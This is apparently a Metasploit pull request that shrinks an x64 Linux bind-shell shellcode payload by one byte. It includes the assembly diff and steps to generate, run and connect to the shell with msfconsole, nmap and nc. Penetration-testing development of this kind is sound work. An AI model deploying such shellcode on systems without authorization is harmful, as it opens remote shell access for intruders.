### PR TITLE
payload/x64: shell_bind_tcp_random_port improvement

### DIFF
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
@@ -5,7 +5,7 @@
 
 module MetasploitModule
 
-  CachedSize = 53
+  CachedSize = 52
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
@@ -41,9 +41,8 @@ module MetasploitModule
       ; Zeroing rdx, search about cdq instruction for understanding
       cdq           ; IPPROTO_IP = 0 (int) - rdx
 
-      push rdx
+      push 1        ; SOCK_STREAM = 1 (int)
       pop rsi
-      inc esi       ; SOCK_STREAM = 1 (int)
 
       push 2        ; AF_INET = 2 (int)
       pop rdi
@@ -77,19 +76,18 @@ module MetasploitModule
       syscall       ; kernel interruption
 
 
-      ; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
+      ; Creating a interchangeably copy of the file descriptors
       ; int dup2(int oldfd, int newfd);
       ; dup2(clientfd, ...)
 
-      push rdi      ; push the sockfd integer to use as the loop counter (rsi)
-      pop rsi
-
       xchg edi, eax ; put the clientfd returned from accept into rdi
+      xchg esi, eax ; put the sockfd integer into rsi to use as the loop counter
 
     dup_loop:
       dec esi       ; decrement loop counter
 
-      mov al, 33    ; syscall 33 - dup2
+      push 33       ; syscall 33 - dup2
+      pop rax
       syscall       ; kernel interruption
 
       jnz dup_loop


### PR DESCRIPTION
This patch reduces the payload to 52 bytes while preserving its functionality using coordinated xchg instructions.
It also guarantees (fix) dup2 call without garbage in rax.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payload/linux/x64/shell_bind_tcp_random_port`
- [ ] `generate -f elf -o shellbindx64.elf`
- [ ] `chmod +x shellbindx64.elf; ./shellbindx64.elf`
**In other CLI**
- [ ]  `sudo nmap -sS 127.0.0.1 -p-`
- [ ] `nc 127.0.0.1 DISCOVEREDPORT`

![image](https://user-images.githubusercontent.com/3372117/106322786-1e002400-6255-11eb-866c-e0f1bf7c7e85.png)
